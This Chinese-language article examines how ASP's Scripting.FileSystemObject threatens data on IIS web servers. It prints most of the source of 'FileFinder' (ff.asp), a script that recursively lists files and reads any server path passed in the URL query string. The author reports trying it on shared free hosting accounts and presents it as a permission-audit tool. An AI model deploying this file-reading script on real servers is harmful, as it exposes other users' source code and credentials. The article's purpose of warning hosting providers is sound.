ASP 中Scripting.FileSystemObject 对象对 IIS WEB 服务器数据安全的威胁及对策

Edward Yang (edyang75@sina.com)

Scripting.FileSystemObject 对象是由 SCRRUN.DLL 提供的许多供 VBScript/Jscript 控制的 COM 对象之一。Scripting.FileSystemObject 提供了非常便利的文本文件和文件目录的访问，但是同时也对 IIS WEB 服务器数据安全造成了一定的威胁。

在继续深入讨论之前，请先到作者的主页http://263.csdn.net/edyang/ Download 区 Source 分栏下载 FileFinder ASP 源代码。

FileFinder 的代码很简单，由3 个函数和 30 行左右的顺序代码构成。

最关键的是 FindFiles 函数，通过对它的递归调用实现对某个目录的遍历，并且按照特定的文件扩展名来搜寻这些文件。

Function FindFiles(strStartFolder, strExt)
Dim n
Dim oThisFolder
Dim oFolders
Dim oFiles
Dim oFolder
Dim oFile

' 如果系统管理员对文件系统的权限进行细致的设置话，下面的代码就要出错
' 但是有些目录还是可以察看的，所以我们简单的把错误忽略过去
On Error Resume Next
n = 0
Response.Write "<b>Searching " & strStartFolder & "</b><br>"
Set oThisFolder = g_fs.GetFolder(strStartFolder)
Set oFiles = oThisFolder.Files
For Each oFile In oFiles
' 如果是指定的文件扩展名，输出连接导向本身，但用不同的命令 cmd
' 在这里是 cmd=read，即读出指定物理路径的文本文件
If IsSuffix(oFile.Path, strExt) Then
Response.Write "<a target=_blank href='ff.asp?cmd=read&path=" & Server.HTMLEncode(oFile.Path) & "'><font color='dodgerblue'>" & oFile.Path & "</font></a><br>"
If Err = 0 Then
n = n + 1
End If
End If
Next
Set oFolders = oThisFolder.SubFolders
For Each oFolder In oFolders
n = n + FindFiles(oFolder.Path, strExt)
Next
FindFiles = n
End Function

下面的代码是对 URL 后面的参数进行分析：

' 读出各个参数的值
strCMD = Ucase(Request.QueryString("cmd"))
strPath = Request.QueryString("path")
strExt = Request.QueryString("ext")
bRawData = UCase(Request.QueryString("raw"))

' 默认搜索 .ASP 文件
If strPath = "" Then
strPath = "."
End If
If strExt = "" Then
strExt = ".asp"
End If

' 根据不同的命令 cmd 执行不同的代码
Select Case strCMD
Case "FIND"
Response.Write FindFiles(strPath, strExt) & " file(s) found"
Case "READ"
If bRawData = "T" Then
Response.Write ReadTextFile(strPath)
Else
Response.Write "<pre>" & Server.HTMLEncode(ReadTextFile(strPath)) & "</pre>"
End If
Case Else
Response.Write "<h3>Please specify a command to execute</h3>"
End Select

从上面的分析可以看出，如果有足够的权限的话，我们就可以通过 FileFinder 来查找 IIS WEB 服务器上的任意文本文件，并且可以轻松的察看文件内容。对于非文本文件，可以确定他们是否存在及其所在路径，这对于高级 Hacker 们来说，这些信息有时是极其重要的。

但是这些对数据安全的威胁的前提条件是执行 FF.ASP 的用户至少拥有读取目录和文件的权限。由于 Windows NT Server 在安装后的默认安全设置是所有用户都可以“读取”目录和文件，所以不管是 IIS 默认的你名用户 IUSR_servername 还是别的什么用户，都可以顺列的读取目录和文件的信息。而大多数 Windows NT Server系统管理员主要关心系统是否能够运行的起来，一般不愿意去改动默认的目录和文件权限，毕竟那样做要冒很大的风险，而且需要很多次得经验。所以，我们可以用 FileFinder 来检查作为 WEB 服务器的 NT Server 的文件系统的安全设置是否安全。

作者专门对作为 IIS WEB 服务器的文件系统的权限进行了人工设置，但限于没有经验，导致了许多奇怪的错误现象，如：所用的做实验的 NT Server 4.0 不能进行 Access 数据库的连接。而在进行文件系统权限改动之前，这些功能是正常的。

本着纯粹研究的目的，作者还在我所申请的免费 ASP 空间上作了试验（包括 CSDN 提供的我的个人主页），结果是 FileFinder 都可以顺利运行。而在http://www2.domaindlx.com/index.html 申请的个人主页却没有这个问题，可见这个免费 ASP 主页提供商在这方面做的还是比较认真的。尽管 domaindlx 的 WEB 服务器运行在 Windows 2000 Server 上的，其默认的文件系统的安全权限和 NT 4.0 没有很大的差别。

由于作者的能力有限，就对这个问题讨论到这里。仅以此文来向国内的 ASP 主页提供商提供参考意见，希望能对提供商和客户双方的数据安全都有所帮助。

附：用其它类似的服务器端脚本来运行的 WEB 服务，如果也提供类似 Scripting.FileSystemObject 的对文件系统操作的功能，不管什么平台应该存在同样的问题。